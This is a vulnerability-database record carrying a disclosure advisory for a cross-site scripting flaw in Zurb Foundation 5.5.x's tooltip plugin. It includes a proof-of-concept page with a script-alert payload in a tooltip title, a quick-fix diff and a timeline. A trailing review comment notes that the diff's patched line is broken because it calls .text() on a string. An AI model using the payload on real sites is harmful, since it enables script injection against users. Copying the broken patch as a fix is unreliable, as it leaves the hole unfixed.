Zurb Foundation versions 5.5.1 and 5.5.3 suffer from a cross site scripting vulnerability.
{"id": "1337DAY-ID-26438", "type": "zdt", "bulletinFamily": "exploit", "title": "Zurb Foundation 5.5.3 / 5.5.1 Cross Site Scripting Vulnerability", "description": "Zurb Foundation versions 5.5.1 and 5.5.3 suffer from a cross site scripting vulnerability.", "published": "2016-11-29T00:00:00", "modified": "2016-11-29T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/26438", "reporter": "Winni Neessen", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-01-03T15:14:08", "viewCount": 57, "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "threatpost", "idList": ["THREATPOST:5D5241707AB76ED799696E37D048872A", "THREATPOST:7876640D5EC3E8FE3FE885606BBB1C6D"]}]}, "exploitation": null, "vulnersScore": -0.2}, "sourceHref": "https://0day.today/exploit/26438", "sourceData": "XSS vulnerability in the tooltip plugin of Zurb Foundation 5.x\r\n==============================================================\r\n\r\nURL to this advisory: https://nop.li/foundation5tooltipxss\r\n\r\nVendor\r\n======\r\nhttp://zurb.com/\r\n\r\nProduct\r\n=======\r\n(Taken from http://foundation.zurb.com/sites/docs/v/5.5.3/)\r\nFoundation is the most advanced, responsive front-end framework in the \r\nworld. The framework is mobile\r\nfriendly and ready for you to customize it any way you want to use it.\r\n\r\nVulnerability Type\r\n==================\r\nCross-Site-Scripting Vulnerability\r\n\r\nCVE Reference\r\n=============\r\nN/A\r\n\r\nVulnerability Details\r\n=====================\r\nThe Foundation framework provides an easy way to insert tooltips into \r\nyour code. The corresponding plugin\r\nfor this is *foundation.tooltip.js*. 
Unfortunately the plugin takes \r\nHTML-encoded code from the title\r\nparameter and returns it as actual HTML, allowing an attacker to inject \r\ndynamic HTML/JS into an\r\napplication, if the application allows user input to be placed into title \r\nfields of a tooltip'ed SPAN\r\nentity. Even if the user input is correctly encoded, before adding it to \r\nthe tooltip'ed SPAN, the\r\nFoundation Tooltip JavaScript will re-decode it and inject the actual \r\nHTML code.\r\n\r\nExample code\r\n============\r\nThis code snippet shows a simple HTML page with encoded HTML in a \r\ntooltip, utilizing the Foundation\r\nJS plugin.\r\n\r\n<!DOCTYPE html>\r\n<html class=\"no-js\" lang=\"en\">\r\n <head>\r\n <meta charset=\"utf-8\">\r\n <meta content=\"width=device-width, initial-scale=1.0\" name=\"viewport\">\r\n <title>Foundation 5 Tooltip XSS example</title>\r\n <script src=\"/foundation/js/vendor/modernizr.js\"></script>\r\n <link href=\"/css/vpnauth.css\" rel=\"stylesheet\">\r\n <link href=\"/css/font-awesome.min.css\" rel=\"stylesheet\">\r\n </head>\r\n <body>\r\n <span data-tooltip data-options=\"hover_delay: 50;\" class=\"has-tip\" title=\"&lt;script&gt;alert(&quot;Oh crap! XSS'ed&quot;);&lt;/script&gt;\">This is a tooltip'ed SPAN</span>\r\n <!-- Begin Foundation JavaScript includes //-->\r\n <script src=\"/foundation/js/vendor/jquery.js\"></script>\r\n <script src=\"/foundation/js/foundation/foundation.js\"></script>\r\n <script src=\"/foundation/js/foundation/foundation.tooltip.js\"></script>\r\n <script>//<![CDATA[\r\n $(document).foundation();\r\n //]]></script> <!-- End Foundation JavaScript includes //-->\r\n </body>\r\n</html>\r\n\r\nWhen opened in a browser, the entity-encoded HTML from the title parameter in \r\nline 12 will be grabbed by the\r\ntooltip plugin and re-decoded to plain HTML in the output, causing the \r\nJavaScript to be injected into\r\nthe page. 
A JavaScript alert window will pop up.\r\n\r\nQuick fix/Workaround\r\n====================\r\nThe problem lies in line 197 of *foundation.tooltip.js*:\r\n\r\nvar $tip = $(tip_template(this.selector($target), $('<div></div>').html($target.attr('title')).html())),\r\n classes = this.inheritable_classes($target);\r\n\r\nThe title attribute is read and provided as HTML without any \r\nsanitization. As a quick fix, one could\r\nuse the .text() function of jQuery to sanitize the read value from the \r\ntitle attribute. This might\r\nnot be a full fix for the issue, but at least worked in my examples.\r\n\r\nHere is a diff for quick patching:\r\n\r\n--- ./foundation.tooltip.js.orig 2016-11-28 16:57:31.000000000 \r\n+0100\r\n+++ ./foundation.tooltip.js 2016-11-29 10:45:16.000000000 +0100\r\n@@ -196,3 +196,3 @@\r\n\r\n- var $tip = $(tip_template(this.selector($target), \r\n$('<div></div>').html($target.attr('title')).html())),\r\n+ var $tip = $(tip_template(this.selector($target), \r\n$('<div></div>').html($target.attr('title').text()).html())),\r\n classes = this.inheritable_classes($target);\r\n\r\nAffected versions\r\n=================\r\nSuccessfully tested in Zurb Foundation 5.5.1 and 5.5.3\r\n\r\nTimeline\r\n========\r\n- 2016-03-01: Opened issue with Zurb\r\n- 2016-03-03: Reply from a Foundation DEV and assignment to a different \r\ndeveloper to take care\r\n- 2016-04-20: Nothing happened, thus I asked for an update on the issue. \r\nNo reply.\r\n- 2016-06-08: Still nothing happened. Asked for an update again. No \r\nreply.\r\n- 2016-11-28: Still no reply, so I closed the ticket and announced the \r\ndisclosure\r\n- 2016-11-29: Release of this advisory\n\n# 0day.today [2018-01-03] #", "_state": {"dependencies": 1647589307, "score": 1659729680, "epss": 1678852985}}
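Review bot: the `+` line of the hunk calls `.text()` on the return value of `$target.attr('title')`, which is a plain JavaScript string rather than a jQuery object, so the patched line throws a TypeError the first time a tooltip is built instead of sanitizing anything. The fix the text describes (use jQuery's `.text()` so the title is treated as text, not markup) corresponds to `$('<div></div>').text($target.attr('title')).html()`, which sets the title as a text node and reads back the entity-escaped serialization; the hunk should use that form, and the advisory's note that the workaround "might not be a full fix" should be kept, since the tip template is still built from HTML.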